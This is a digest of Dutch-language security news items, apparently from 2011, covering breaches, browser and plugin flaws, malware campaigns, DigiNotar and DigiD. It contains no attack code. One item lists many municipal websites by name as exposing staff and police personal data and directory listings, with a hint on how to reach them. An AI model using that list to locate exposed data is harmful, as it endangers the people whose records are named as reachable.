    Na het aanmelden wordt er een cookie op de computer van een gebruiker geplaatst met de naam JSESSIONID. De informatie kan zo op een andere computer worden ingevuld en daarmee wordt de sessie overgenomen. Zolang niet wordt uitgelogd verloopt het cookie niet. Dat ontdekte Sander Akkerman, die Webwereld tipte.

    De cookies worden gebruikt voor het aanmelden bij de website en het voortzetten van de sessie. Nog niet iedere webbrowser is beschermd tegen het stelen van cookies via bijvoorbeeld een XSS-aanval, waardoor de cookie te stelen is en de sessie overgenomen kan worden. Hetzelfde geldt bij herzenden van de cookies na bijvoorbeeld het afsluiten van de website en het opnieuw openen.

  • webcamWebsites kunnen de webcam en microfoon van bezoekers inschakelen om hen vervolgens af te luisteren en te begluren. Dat ontdekte beveiligingsonderzoeker Feross Aboukhadijeh. De onderzoeker kan via clickjacking de instellingen van de Flash Settings Manager wijzigen en plaatste de broncode hiervoor online. Bij clickjacking worden gebruikers verleid tot het klikken op een website, waarbij de kliks voor andere doeleinden worden gebruikt dan de gebruiker denkt. 

    De aanval van Aboukhadijeh is een variatie van een normale clickjacking techniek die spammers op Facebook en andere websites al gebruiken. "Combineer cllickjacking met de Adobe Flash Player Setting Manager pagina en je hebt een recept voor slechte tijden." De onderzoeker verstopte het Flash-bestand achter een iframe op een pagina, waardoor hij 'framebusting JavaScript code' kan omzeilen. 

    Webcam
    "Ik heb een lek in Adobe Flash ontdekt waardoor elke website je webcam en microfoon kan inschakelen, zonder dat je dit weet of waar je toestemming voor geeft, om je vervolgens te bespioneren." De aanval zou in theorie op alle browsers werken, maar op dit moment lopen alleen gebruikers van Firefox en Safari risico. 

    "Hoewel elke browser en besturingssysteem in theorie kwetsbaar zijn voor deze aanval, vereist het inschakelen van de webcam meerdere gerichte clicks, wat lastig is voor een aanvaller om uit te voeren", laat Aboukhadijeh in zijn blogposting weten. "Ik weet niet hoe bruikbaar deze techniek in het wild is, maar ik hoop dat Adobe snel met een oplossing komt en we dit niet hoeven te ontdekken." 

    Update
    Adobe meldt dat het aan een oplossing werkt die mogelijk deze week al wordt uitgerold. Het gaat hier niet om een update voor Adobe Flash Player, er zal dan ook geen patch of security bulletin voor eindgebruikers verschijnen. Een soortgelijk probleem deed zich ook in 2008 voor, toen verscheen er wel een update voor die gebruikers moesten installeren. 

    De onderzoeker had Adobe een aantal weken geleden gemaild, maar volgens het bedrijf was dat bericht bij een werknemer terecht gekomen die met sabbatical is. Adobe kreeg het lek daardoor pas te weten toen de blogposting van Aboukhadijeh online verscheen.

  • De hackers die toegang verkregen tot systemen van de Nasdaq-aandelenbeurs, hebben volgens persbureau Reuters vertrouwelijke documenten kunnen inzien. Tot nu toe hield de beurs vol dat er geen gegevens van bedrijven waren uitgelekt.

    In februari werden systemen van de Amerikaanse technologie-effectenbeurs Nasdaq gekraakt, maar de beurs claimde destijds dat er geen gegevens van beursgenoteerde bedrijven waren ingezien. Volgens persbureau Reuters is dat echter wel gebeurd.

    De hackers zouden zichzelf toegang hebben verschaft tot Directors Desk, een website waar raden van bestuur documenten kunnen delen. Daartoe zou spyware zijn geïnstalleerd. Het is onduidelijk of dat gebeurde via een directe aanval op de webserver van Directors Desk, waarbij documenten werden buitgemaakt, of dat via die website spyware werd geserveerd die op computers van leidinggevenden terecht kwam.

  • Microsofts Research Cambridge werkt aan een holografische interface. Met het zogeheten Holodesk kunnen driedimensionale virtuele objecten met de hand 'vastgepakt' en verplaatst worden, tonen de onderzoekers in een demonstratievideo.

    De wetenschappers van de Sensors and Devices Group van Microsoft Research Cambridge maken voor het project gebruik van verschillende soorten sensoren. Holodesk werkt met een Kinect-camera, waarmee virtuele en fysieke objecten 'samenvallen'. Zo kan er een virtuele bal worden vastgepakt of een potje schaak worden gespeeld.

    Microsoft maakt voor het project gebruik van beamsplitters en een graphic processing algorithm. Daarmee zou de Holodesk anders zijn dan bestaande 3d-projecten, schrijven de ontwikkelaars. In het videofragment laten de onderzoekers onder meer zien hoe een virtueel balletje in een fysieke beker kan worden gestopt.

    De Holodesk is een van Microsofts technieken op het gebied van natural user interface. Onlangs liet het bedrijf weten dat het werkt aan de touchscreen-projector OmniTouch, waarmee alle oppervlakken in een touchscreen kunnen veranderen. Ook die techniek werkt met een Kinect-camera.

    Bron: Tweakers.net

  • Beveiligingsfirma Sophos waarschuwt websitebeheerders voor een aantal geraffineerde aanvalsmethodes. Met behulp van php-scripts kunnen sites gedefaced worden zonder dat de eigenaar het bemerkt.

    Een groeiend aantal websites wordt door hackers belaagd met code-injectie-aanvallen, voornamelijk via iframes. Via de iframes worden vervolgens php-scripts ingeladen, zo meldt Sophos. Door aanpassingen aan het script kan een site voor elke bezoeker die de betreffende website opvraagt gedefaced worden, terwijl zoekmachine-bots uitgesloten worden.

    Door het uitsluiten van zoekmachines wordt voorkomen dat gekraakte pagina's uit de zoekindexen worden verwijderd. Bovendien werken de scripts via een blacklist zodat een bezoeker slechts eenmaal de defacement te zien krijgt, waardoor het lastiger is om het probleem te identificeren.

    Sophos merkt bovendien op dat de kwaadaardige php-scripts zo zijn gemanipuleerd dat deze door websitebeheerders en beveiligingsfilters minder snel gedetecteerd worden. Niet alleen wordt de code meerdere malen versleuteld en gecomprimeerd via php-functies als base64_decode en gzinflate, ook worden scripts via obfuscation nog moeilijker te detecteren. Volgens Sophos kunnen site-eigenaren zich tegen deze aanvalsmethode deels verdedigen door regelmatig de bestandsgrootte en -datum van php-scripts op de server te controleren op mogelijke afwijkingen.

    Bron: Tweakers.net

  • malware_stats1
    In 2011 is er nog geen enkele nieuwe malware of kwaadaardige applicatie voor de iPhone ontdekt, zo laten onderzoekers van Microsoft weten. Ook BlackBerry-gebruikers hoeven zich nauwelijks zorgen te maken, aangezien de teller voor dit platform op één staat. Symbian daarentegen is nog altijd het meest aangevallen platform, op afstand gevolgd door het Java Platform Micro Edition. Android staat op de derde plek wat betreft het aantal gedetecteerde dreigingen, net voor Windows CE. 
    In het geval van Symbian telefoons werden dit jaar twee nieuwe Trojaanse paarden ontdekt die mobiele TAN-codes stelen om zo bankrekeningen te plunderen. In het geval van Java-malware gaat het vooral om programma's die dure sms-berichten versturen. Microsoft zag het aantal dreigingen voor het Android-platform groeien, hoewel dit nog niet in verhouding tot Symbian staat. Verder bleek een exploit voor Android 2.2 door veel kwaadaardige apps te worden gebruikt om hun rechten op de smartphone te verhogen. 

    Ook de ontwikkeling van Windows Mobile-malware staat op een laag pitje. Dit jaar werden slechts drie nieuwe dreigingen ontdekt. De eerste twee versturen sms-berichten, de derde onderschept mobiele TAN-codes. 

    Gratis
    Problemen ontstaan vooral als gebruikers op onofficiële marktplaatsen of P2P-sites naar gratis applicaties zoeken. "Gebruikers zoeken vaak vanaf hun desktop naar gekraakte of volledige versies van mobiele applicaties die al in de officieel marktplaats beschikbaar zijn", zegt Marianne Mallen. Gebruikers beseffen niet dat een applicatie van malware voorzien kan zijn. "Het is dus verstandig om wanneer mogelijk een gedownloade applicatie te scannen, zelfs als het al op een mobiel apparaat staat." 

    Onderstaande tabel bevat het aantal gedetecteerde dreigingen die op de desktops van Windows-gebruikers werden aangetroffen. In het geval van BlackBerry en iOS staan hier ook honderden en zelfs duizenden gedetecteerde dreigingen vermeld. Het gaat hier echter om kwaadaardige apps die al sinds vorig jaar bekend zijn. 

    bron: Security.nl

  • metasploitframeworkHet is bijna twee jaar geleden dat de populaire hackertool Metasploit door beveiligingsbedrijf Rapid7 werd overgenomen, en om dat te vieren maakt de beveiliger de Community Edition gratis beschikbaar. Metasploit is een framework waarmee gebruikers de beveiliging van systemen en netwerken kunnen testen. 

    De Community Edition is een gratis commercieel product dat zowel voor persoonlijk als zakelijk gebruik beschikbaar is. De versie beschikt over dezelfde "network discovery" , "data import" en "Nexpose integratie" als de Metasploit Pro tegenhanger. De user interface is gebaseerd op Metasploit Pro 4.1, wat het in kaart brengen van grote netwerken nog eenvoudiger zou moeten maken. Gebruikers kunnen in het netwerk een doelwit selecteren en daar vervolgens een exploit op los laten. 

    Gebruiksvriendelijk
    Volgens Metasploit-ontwikkelaar H.D. Moore is de Community Edition bedoeld om het gat tussen twee soorten Metasploit-gebruikers te dichten. Het gratis framework werd aan de ene kant gebruikt door beveiligingsonderzoekers en ontwikkelaars, die vooral met de console interface werken. Aan de andere kant zijn er security en IT-professionals, die het gebruiken om systemen te testen. Voor die groep zou de console interface minder "intuitief" zijn, merkt Moore op. 

    "Organisaties van klein tot groot hebben te maken met beveiligingsdreigingen", gaat de ontwikkelaar verder. Het is echter niet voor alle organisaties weggelegd om commerciële software aan te schaffen. "Daarom gebruiken zovelen het Metasploit Framework. Voor deze tweede groep willen we het leven eenvoudiger maken, ongeacht de omvang van hun organisatie of budget."
    bron: Security.nl

  • oracle_javaOracle heeft een grote reeks updates uitgebracht. Deze lossen 76 lekken in honderden programma's op. Het gaat om 56 kwetsbaarheden in de database-software en 20 in Java. Via de kwetsbaarheden kan een aanvaller in het ergste geval een kwetsbaar systeem overnemen. 

    Met name voor eindgebruikers is het belangrijk om de Java-update te installeren. Niet alleen zijn de lekken die Oracle dit kwartaal verhelpt het ergst in Java, de Java browser-plugin is op het moment één van de meest aanvallen plugins waarmee malware op computers wordt geïnstalleerd. 

    Voor de database-software zijn de kwetsbaarheden in de Solaris of Oracle Sun Products Suite met een CVSS 2.0 Base Score van 9,3 het gevaarlijkst, terwijl de Java-lekken een 10,0 kregen. Oracle adviseert gebruikers en beheerders dan ook om de updates zo snel als mogelijk te installeren.
  • opera_logoEen beveiligingsonderzoeker heeft een exploit voor Opera gepubliceerd. Met de exploit kunnen kwaadwillenden code uitvoeren op systemen van Opera-gebruikers. Het gaat om een zogenoemd 'zero day'-lek: er is nog geen patch voor. De exploit lijkt alleen te werken onder Windows XP met Service Pack 3.

    Het beveiligingslek doet zich voor in de afhandeling van svg-graphics binnen een frameset, schrijftThe H Security. Beveiligingsonderzoeker José Vazquez zou het lek al een jaar geleden hebben ontdekt en Opera na twee maanden op de hoogte hebben gesteld. Vazquez schrijft op zijn weblog dat het om een zogenoemd 'zero day'-kwetsbaarheid gaat: er bestaat nog geen patch voor. De exploit laat kwaadwillenden eigen code uitvoeren op systemen van Opera-gebruikers. De exploit kan de data execution prevention-bescherming in Windows uitschakelen, maar dan wordt deze wel onbetrouwbaarder.

  • facebookScammers grijpen de dood van Steve Jobs met beide handen aan. Op Facebook hebben ze een pagina opgezet met malware. Ongeveer 21.000 facebookers trapten erin.

    Enkele uren nadat het nieuws van de dood van Steve Jobs naar buiten kwam, zetten de scammers een Facebookpagina op met de naam ´R.I.P. Steve Jobs´.

    iPad winnen
    Volgens Pandalabs kwamen er elk seconde 5 nieuwe fans bij en binnen enkele uren telde de pagina 90.000 fans. Op de pagina stond dat er 50 iPads werden weggeven vanwege het overlijden van Steve Jobs.

    De link om de iPad te winnen leidde de gebruikers door naar een website met malware. Ongeveer 21.000 gebruikers klikten op de malwarelink en raakten besmet. De pagina werd om 8.00 's ochtends verwijderd.

    Zelfde als 11 september
    Directeur Luis Corrons gaf aan dat PandaLabs had verwacht dat scammers de dood zouden aangrijpen voor het uitvoeren van scams. "Jammer genoeg, toen we hoorden van Steve Jobs' dood, wisten we dat scammers dit zouden gebruiken," zegt Luis Corrons, technisch directeur van PandaLabs. "Het is niet ongebruikelijk voor criminelen om misbruik te maken van belangrijke gebeurtenissen om malware te verspreiden zodat ze zoveel mogelijk slachtoffers kunnen maken."

    De verkleinde URL die leidde naar de malwarepagina doet volgens PandaLabs vermoeden dat het dezelfde scammers zijn die Facebookers eerder dit jaar probeerden te besmetten met een pagina opgezet voor de 10de herdenking van 11 september.

    Bron: Webwereld.nl

  • lek_gatenkaasEn dan bedoelen we niet een beetje lek. Maar echt gigantisch omfg niet te geloven wat een enorm gat daar passen moeiteloos vijf Boeing 747's naast elkaar in. Zo lek dus. Dat je denkt: hebben die lui dan helemaal niets geleerd van Diginotar? Ja we hebben het tegen jullie: beemster.netbemmel.eu,bergambacht.nlbeverwijk.nl en binnenmaas.nl We kunnen zomaar de NAW van ambtenaren en overige medewerkers zien in jullie database. Hetzelfde geldt voor: bladel.nlborger-odoorn.nldebeekseakkers.nl,debilt.nldemarne.nldoetinchem.nl en drimmelen.nl. Willen jullie echt dat we de NAW van politiemensen kunnen bekijken? Of wijzigen? We hebben het ook tegen jullie: drin.nldronten.nlenkhuizen.nlgemeentevlist.nlgemvlist.nlgendt.nlgenemuiden.nl
    gilzerijen.nlharenkarspel.nlhasselt.nlheumen.nl,huissen.nllaarbeek.nl. Jeetje wat een boel interne documenten hebben jullie onbeveiligd online gezet. Elke prutser kan ze verwijderen of andere shit toevoegen. Idem bij: landgraaf.nllandvanwehl.nllemsterland.nlleudal.nllingewaard.nllittenseradiel.nlnederlek.nl
    nijkerk.org. Ja hoorrr: zelfs complete digiD sessie files. Kunnen de IT-mensen op het gemeentehuis dan echt helemaal niks? Zie ook: noorderkoggenland.nlolst.nlolst-wijhe.nl,rijnwaarden.nlsevenum.nl
    s-gravendeel.nlsint-oedenrode.nl,sportzeewolde.nl OMG je tikt gewoon dir + schuine streep en alle geheime databases verschijnen gewoon op het scherm.

  • mysqlDe MySQL-server is maandag door onbekenden gekraakt. Op de site werd kwaadaardige javascript-code geplaatst waardoor de browser naar een website werd gestuurd waarop malware was te vinden. Mysql.com zou nu weer veilig zijn.

    Dat meldt de website Armorize. Ook op GoT wordt melding gemaakt van malware op Mysql.com. De kwaadaardige code was verpakt in een iframe. De javascript-code zorgde dat de bezoeker via een redirect naar een domein werd gestuurd waarop de BlackHole-exploit is te vinden. Deze poogt het besturingssysteem te besmetten door te zoeken naar diverse kwetsbaarheden in, onder andere, diverse browsers en plugins als Java, Adobe Flash en Adobe Reader. De gebruiker zou geen dialoogvensters in beeld krijgen waardoor de malware zich stiekem weet te installeren.

  • bluetoothBluetooth carkits zijn een eenvoudig doelwit voor hackers, die de apparaten kunnen laten crashen of overnemen, aldus een Amerikaans beveiligingsbedrijf. "Samen met onze partners hebben we meer dan tien verschillende Bluetooth carkits dit jaar getest", zegt CTO Ari Takanen. "In alle werden ernstige problemen gevonden." Bluetooth is met name kwetsbaar voor misvormde invoer. Daardoor kan het apparaat trager reageren, onverwacht gedrag vertonen, crashen of in het ergste geval een aanvaller toegang tot het Bluetooth toestel geven. De kwetsbaarheden zijn te misbruiken zonder dat de gebruiker de verbinding opmerkt of moet accepteren. 

    Consument
    Aangezien Bluetooth applicaties geen toegang tot vertrouwelijke gegevens bieden, zou er volgens Takanen nog weinig motivatie bij aanvallers zijn om de Bluetooth interface aan te vallen. 

    Nu zowel carkits als medische apparatuur steeds vaker de technologie gebruikt, kan dit veranderen. "Bluetooth wordt meestal gebruikt in consumentenproducten en consumenten kopen eerder het goedkoopste dan het beste product", merkt Takanen op.
    bron: security.nl
  • bank-trojanMicrosoft heeft onlangs een Trojaans paard ontdekt dat online bankrekeningen via een remote proxy script probeert te plunderen. Eenmaal geopend, laadt de Banload Trojan een website waarop een animatie is te zien. In de achtergrond worden de instellingen van de browser aangepast, omdat het 'Proxy Automatic Configuration script' te gebruiken. Het script zorgt ervoor dat de internetverbinding van de gebruiker via een proxy-server loopt. 

    Instellingen
    Zodra de gebruiker bepaalde banksites bezoekt, wordt het verkeer automatisch naar een ander IP-adres doorgestuurd. Het gaat vooral om internetgebruikers die de websites van de HSBC en Santander bank bezoeken. 
  • govcertVirusuitbraak bij de gemeente Heusden, malware infectie gemeente Amsterdam en virusinfectie op een netwerk van de gemeente Den Haag. Slechts enkele van de beveiligingsincidenten die bij de overheid plaatsvonden en door overheidsinstanties GovCERT werden waargenomen. We hadden vorige week al aandacht aan de virusuitbrakenbij de overheid besteed, maar nu heeft IT-journalist Brenno de Winter de lijst ook voor het publiek online gezet. 

    Media
    Zo staan er verschillende Denial of Service-aanvallen vermeld, maar ook beveiligingslekken in verschillende overheidssites worden genoemd. GovCERT monitort niet alleen de eigen netwerken en van diens partners, maar ook de media. "Artikel mbt fraude met DigiD", "KLPD en BZK genoemd in gelekte mails HBGary affaire", "Trouw-artikel over hacks op overheidswebsites" en "Belastingdienst in NOVA-item over USB-sticks" komen ook op de lijst voor. 
  • LibyanArmyElectronic

    Een hacker van het 'Libyan Army Electronic' heeft de Nederlandstalige fora van Game Maker, een populaire spelletjesmaker voor jongeren, gekraakt. Daarbij zouden geen persoonlijke gegevens zijn buitgemaakt. Het lek is gedicht.

    Het forum van Game Maker en zijn broertje GMOT kampten zondagavond met een zogehetendeface, waarbij kwaadwillenden de hoofdpagina hadden veranderd. Daarop eiste een hacker met het pseudoniem Lybia & One van het Libyan Army Electronic de aanval op. Uit de bijnaam van de hacker lijkt er een relatie te zijn met de situatië in Libië.

    Volgens de webmasters zijn de gegevens van de 15.000 gebruikers waarschijnlijk niet op straat beland. Het is niet duidelijk waarom het 'virtuele leger' juist de fora van Game Maker, een project dat werd gestart door professor Mark Overmars, koos voor een aanval. Mogelijk waren die lukraak gekozen; Het Libyan Army Electronic heeft een breed scala van defaces op zijn naam staan.

    Bron: tweakers.net

  • typosquattingTwee beveiligingsonderzoekers hebben aangetoond wat de gevolgen kunnen zijn van typosquatting. In een half jaar tijd ontving het duo via valse domeinnamen meer dan 120.000 mailtjes met daarin wachtwoorden en andere gevoelige zaken.

    Voor het onderzoek hebben de twee onderzoekers, Peter Kim en Garrett Gee, dertig domeinnamen geregistreerd. Deze domeinnamen kwamen overeen met subdomeinen op websites van Fortune 500-bedrijven, waarbij de punt tussen het subdomein en hoofddomein achterwege werd gelaten. De onderzoekers hanteerden hiermee een praktijk die bekendstaat als typosquatting, waarbij domeinnamen worden geregistreerd die erg veel lijken op een legitieme domeinnaam, maar net anders zijn geschreven.

  • bitcoinCriminelen verspreiden onder meer op Twitter malware die het mogelijk maakt om via botnets op grote schaal bitcoins te genereren. Dit gebeurt met miners die ongemerkt op een pc worden geïnstalleerd en op de achtergrond draaien.

    Dat meldt beveiligingsfirma TrendMicro op zijn weblog. Het bedrijf signaleerde op Twitter links die verwezen naar onder andere op Facebook gehoste malware. De malware, worm_kolab.smqx geheten, start op besmette systemen een zogeheten bitcoin-miner. Met deze tool kunnen bitcoins, een steeds populairder wordende, virtuele munteenheid, worden gegenereerd.

    Opvallend bij de malwareaanval is dat de miners, die gebruikmaken van de rekenkracht van het besmette systeem, centraal aangestuurd kunnen worden via een botnet. Door zo grote clusters te genereren, kunnen de aanvallers op grote schaal bitcoins genereren. Omdat bitcoins anoniem van eigenaar kunnen wisselen, is het bovendien lastig om de aanvallers te lokaliseren.

    Bron: Tweakers.net

  • smulwebDe receptensite Smulweb is in het afgelopen weekend slachtoffer geworden van een hack. Bij de aanval zijn wellicht persoonsgegevens van bijna een miljoen leden buitgemaakt. Moederbedrijf Younity Media weigert details te geven over de hack.

    In een mail aan de 950.000 leden bevestigt Smulweb dat de hackers geprobeerd hebben om de persoonlijke gegevens van leden uit de database te ontvreemden. Onduidelijk is of de aanvallers hierin geslaagd zijn.

    Tijdens de registratie moeten gebruikers onder andere hun naam, e-mailadres en huisadres opgeven. Het is mogelijk om via de website bestellingen te plaatsen, maar volgens Smulweb-directeur Michiel Slegt stonden er geen betaalgegevens in de getroffen database.

  • Een Turkse hackersgroepering die zich TurkGuvenligi noemt en bekendstaat om zijndefacements, heeft via een succesvolle dns-hijack enkele grote sites, waaronder de Britse it-nieuwssite The Register en koeriersdienst UPS, defaced.

    TurkGuvenligi

    Ook heeft de groepering de dns van onder andere The Daily Telegraph, Vodafone, Acer en National Geographic aan kunnen passen, waardoor het ook bij deze sites enige tijd leek alsof de website was beklad.

    De aanval op The Register en de overige sites zou zijn uitgevoerd middels 'dns-hijacking'; alle websites maken gebruik van de registrar Net­Names. Vermoedelijk hebben de hackers toegang gekregen tot het dns-systeem, waarna de genoemde sites via een redirect naar een ander adres werden doorgestuurd.

  • Hacker Kevin Mitnick legt uit hoe eenvoudig het is om met behulp van een open source programma een beveiligde voicemail af te luisteren. Hij geeft ook de tip om je ertegen te beveiligen.

  • Het certificaat dat een Beverwijks bedrijf per abuis uitgaf en dat Iran hielp om internetters te bespioneren, blijkt het gevolg van een hack te zijn. Deze hack werd in juli al ontdekt, maar het certificaat werd onlangs pas ingetrokken.

    lock_openMaandag en dinsdag kwam DigiNotar in het nieuws doordat een frauduleus certificaat dat door het Beverwijkse bedrijf werd uitgegeven, mogelijk door Iran is gebruikt om op Google-gebruikers te spioneren. Naar nu blijkt is dat het gevolg van een hack, waarbij niet alleen een Google-certificaat is vervalst maar ook andere certificaten zijn nagebootst.

    In een verklaring schrijft Vasco Security, sinds januari eigenaar van DigiNotar, dat de hack al half juli heeft plaatsgevonden. Toen DigiNotar de hack ontdekte, op 19 juli, heeft het bedrijf de frauduleuze certificaten ingetrokken. Hierbij is er echter minimaal één over het hoofd gezien: het certificaat dat voor Google.com is gebruikt.

    Pas toen de Nederlandse overheidsorganisatie GovCert deze week ontdekte dat een frauduleus certificaat nog niet ingetrokken was, is deze alsnog ongeldig gemaakt. Het is onduidelijk of er nog valse ssl-certificaten van DigiNotar in omloop zijn.

  •  

    php2Het PHP ontwikkelteam adviseert gebruikers en beheerders om niet naar de laatste versie te updaten, omdat er een ernstig probleem in één van de cryptografische functies zit. PHP is één van de meest gebruikte scripttalen op het internet en wordt in tal van websites toegepast. PHP 5.3.7 verscheen vorige week en verhelpt een aantal beveiligingsproblemen, maar blijkt zelf ook een probleem te introduceren. Wordt de crypt() functie voor MD5 salts gebruikt, dan wordt alleen de salt-waarde in plaats van de gesalte hash-waarde teruggegeven. 

    Het probleem speelt alleen bij MD5, de Blowfish en DES algoritmen werken gewoon naar behoren. Opmerkelijk genoeg was het crypto-lek op 17 augustus aan het PHP ontwikkelteam gerapporteerd, een dag later werd toch versie 5.3.7 uitgegeven. Gebruikers krijgen het advies om op versie 5.3.8 te wachten.

    Sinds 23-8-2011 is update 5.3.8 uitgegeven. Download hem van php.net.

  • hp_android

    Een groep ontwikkelaars is begonnen aan een project om Android te porten naar de TouchPad van HP,die standaard WebOS draait. De tablet vloog de laatste dagen de winkel uit nadat HP besloot een forse prijsverlaging door te voeren.

    HP kondigde vlak voor het weekend een kortingsactie voor de TouchPad aan, nadat het bedrijf liet weten te stoppen met het produceren van tablets. De 16GB-versie kreeg een prijsverlaging van 499 dollar naar 99 dollar, terwijl de 32GB-editie 149 euro ging kosten. Door de prijsverlaging wist HP afgelopen weekend naar schatting 350.000 TouchPads te verkopen. In veel webwinkels is de tablet dan ook uitverkocht.

    Nu HP besloten heeft om te stoppen met de op WebOS draaiende TouchPad, zijn een vijftal ontwikkelaars het project Touch Droid gestart om de tablet in eerste instantie op Android 2.3 te laten draaien. Zodra deze stabiel op de TouchPad draait, wil het ontwikkelteam de stap naar Android 3.0 Honeycomb maken. Deze versie van Googles opensource-OS is meer geschikt voor tablets. Met behulp van de bestaande Palm-sdk kan een TouchPad-gebruiker al roottoegang tot zijn tablet krijgen.

    bron: tweakers.net

  • Intressante video over het eenvoudig modificeren van android apps!!

  • De afgelopen dagen zijn naar schatting 22.000 websites en ruim 500.000 pagina's gehackt en misbruikt voor het verspreiden van nep-virusscanners. De aanval werd het eerst op 14 augustus opgemerkt en is volgens beveiligingsbedrijf Armorize nog steeds gaande. Op gehackte websites wordt een iframe geïnjecteerd, dat bezoekers naar een exploit-toolkit wijst.

    Deze toolkit gebruikt verschillende beveiligingslekken in ongepatchte software om een nep-virusscanner te installeren. De nep-virusscanner doet zich voor als "XP Security 2012" onder Windows XP, "Vista Antivirus 2012" onder Vista en "Win 7 Antivirus 2012" onder Windows 7.

  • Voorheen was het lastig voor hackers die elkaar op IRC of fora tegenkwamen om de ander in te schatten, iets waar RankMyHack.com verandering in moet brengen. De website is volgens de bedenker "gebouwd om een duidelijke indicatie te geven van wat een hacker kan." Ook houdt het bij wat een hacker onder zijn alias allemaal heeft gedaan, waardoor andere hackers weten met wie ze te maken hebben.

    Wie op "hacking fora" actief is, kan een heuse signature banner toevoegen om te laten zien hoe goed hij of zij websites kan kraken en defacen. "Online reputatie is geen wedstrijd om de populariteit van gelijkgestemden, maar gaat om de ruwe kennis van een hacker om websites en servers te compromitteren."

    rankmyhack
     
    Klassement
    Naar eigen zeggen is de website geen "tweede Anonymous of LulzSec". Daarbij moedigt RankMyHack ook het aanvallen van websites aan. Er is een "duelsysteem", waar hackers elkaar kunnen uitdagen. Dit gedeelte was eerst een klein deel van de website, maar is nu één van de voornaamste attracties. Een hacker genaamd 'mudkip', die op de Huffington Post wist in te breken, voert het klassement aan.
  • androidDoor een ontwerpfout in Android kunnen cybercriminelen inloggegevens stelen, aldus onderzoekers op Blackhat. Volgens Google is het geen fout maar een feature.

    Beveiligingsonderzoekers Nicholas Percoco en Sean Schulte van Trustwave hebben een manier gevonden waarop criminelen in Android inlogingegevens kunnen stelen. Ook kunnen twijfelachtige adverteerders hiermee pop-ups construeren die nagenoeg niet te negeren zijn, dat meldt CNet op basis van een presentatie op hackersconferentie Defcon.

    Inlogscherm vervangen

    In Android kan een app die bijvoorbeeld een update heeft naar de voorgrond worden geplaatst, zodat de update onder de aandacht komt van de gebruiker. Deze functie zit standaard in de software development kit van Android, hoewel developers deze functie nauwelijks gebruiken. Ze plaatsen eerder een waarschuwing in de statusbalk.

  • trojanEen Franse beveiligingsonderzoeker heeft de broncode van de gevaarlijke SpyeEye Trojan op het internet gelekt, wat mogelijk een zware slag voor cybercriminelen is. SpyEye wordt voornamelijk gebruikt voor het plunderen van online bankrekeningen en is de opvolger van de beruchte Zeus Trojan, waarvan eerder dit jaar ook de broncode lekte.

    De Franse onderzoeker met het alias 'XyliBox' analyseerde en kraakte de hardware identificatie van de malware. Die zorgt ervoor dat de installatie van het programma op maar één computer werkt. "Dit lek is belangrijk omdat het de programmeertechnieken van de SpyEye-auteurs demonstreert en is ook een tegenslag voor het cybercriminele ecosysteem", zegt Sean Bodmer van beveiligingsbedrijf Damballa.

    Broncode
    Nu de broncode van de SpyEye builder beschikbaar is, de tool die de SpyEye malware genereert, kunnen onderzoekers naar beveiligingslekken in het programma zoeken. Ook helpt het beveiligingsbedrijven om de technieken en methodes achter de nieuwste SpyEye versie beter te begrijpen. Aan de andere kant profiteren ook cybercriminelen van de code. De gekraakte versie wordt inmiddels door cybercriminelen toegepast, zo blijkt uit cijfers van de SpyEye-tracker, die het aantal Command & Control-servers van het Trojaanse paard monitort.

    "Met dit lek en het lek van de Zeus broncode in maart, maakt dit één van de grootste botnet-ondernemingen kwetsbaar voor allerlei horizontale en verticale aanvallen door overheden, wetshandhavingsinstanties, beveiligingsbedrijven en zelfs andere criminelen die hun bereik op het internet willen vergroten", zegt Bodmer. De analist verwacht dat SpyEye nu een grotere dreiging zal worden, net als wat er met Zeus gebeurde toen de broncode daarvan lekte.

    Update
    Volgens bronnen is de SpyEye Loader die op internet te vinden is, een 'crack' om de SpyEye builder te draaien.
  • wordpress-securityDe afgelopen weken zijn meer dan vierduizend WordPress blogs gehackt en gebruikt om Google Image zoekresultaten naar kwaadaardige servers met malware door te sturen. Beveiligingsonderzoeker Denis Sinegubko ontdekte 4.358 blogs die populaire afbeeldingen van andere websites met doorstuur pagina's combineren, en bezoekers naar verschillende websites doorsturen. Uiteindelijk krijgen slachtoffers een afbeelding te zien dat hun computer met malware geïnfecteerd is en ze de infectie via de aangeboden nep-virusscanner kunnen verwijderen.

    Backdoor
    Google zou bij minder dan vijf procent van de gehackte WordPress blogs een waarschuwing aan gebruikers van de zoekmachine geven dat de website schadelijk is. Hoe aanvallers de weblogs wisten over te nemen is onduidelijk, maar Sinegubko vermoedt dat er een backdoor-script is gebruikt. Mogelijk voor een lek in een WordPress theme of plugin.

    Veel van de gehackte websites gebruikten de timthumb-plugin, waar onlangs nog een beveiligingslek in werd gevonden. De onderzoeker adviseert webmasters om naar verdachte "rewrite rules" in het .htaccess-bestand te kijken.
  • digid_logoDigiD, de inlogmethode om toegang te krijgen tot overheidswebsites, is een zeer zwak beschermd systeem. Dat stelt Nationale Ombudsman Alex Brenninkmeijer in een interview. Ook zouden slachtoffers niet goed worden geholpen.

    Vorige week stelden beveiligingsonderzoekers dat DigiD een onveilig systeem is. De zwakheden van het inlogsysteem zouden onder andere liggen in het per post bezorgen van inloggegevens. Criminelen kunnen deze buitmaken en bijvoorbeeld toegang krijgen tot de Belastingdienst.

    Een ander gevaar zou zijn dat het DigiD-systeem niet consequent een extra verplichte verificatiestap heeft ingebouwd, bijvoorbeeld via een sms-systeem of een apparaatje dat een willekeurige toegangscode genereert. Omdat veel consumenten gebruikmaken van dezelfde wachtwoorden op verschillende websites, lopen zij risico. Het Ministerie van Binnenlandse Zaken stelde echter dat de fraude met DigiD beperkt is gebleven tot enkele tientallen concrete gevallen. Ook zou het DigiD-systeem zelf niet zijn gekraakt. Het ministerie gaf wel toe dat er pogingen zijn gedaan om toeslagen van de Belastingdienst te krijgen op naam van een ander.

  • lulzsec2De Braziliaanse tak van hackerscollectief LulzSec heeft 8 gigabyte aan documenten, foto's en audiobestanden van de Braziliaanse Federale Politie online gezet. Volgens de groep blijkt uit verschillende van de documenten dat er op allerlei niveaus in het juridisch systeem corruptie aanwezig is.

    Antisec
    Eerder publiceerde Anonymous 10 gigabyte aan documenten van de Amerikaanse politie. De Amerikaanse en Braziliaanse politie waren niet de enige die gehackt werden.

    De "antisec-beweging" publiceerde vandaag een overzicht met de gegevens van 45.000 Ecuadoraanse politieagenten, waaronder namen, geboortedatum, rank en identificatienummers.

    bron:  security.nl
  • Integriteitoverheid_nlDe website Integriteitoverheid.nl blijkt vatbaar te zijn voor sql-injectie. Hierdoor kon de hele database worden uitgelezen, waarbij ook usernames en wachtwoorden toegankelijk waren. Diverse wachtwoorden waren in plain text opgeslagen.

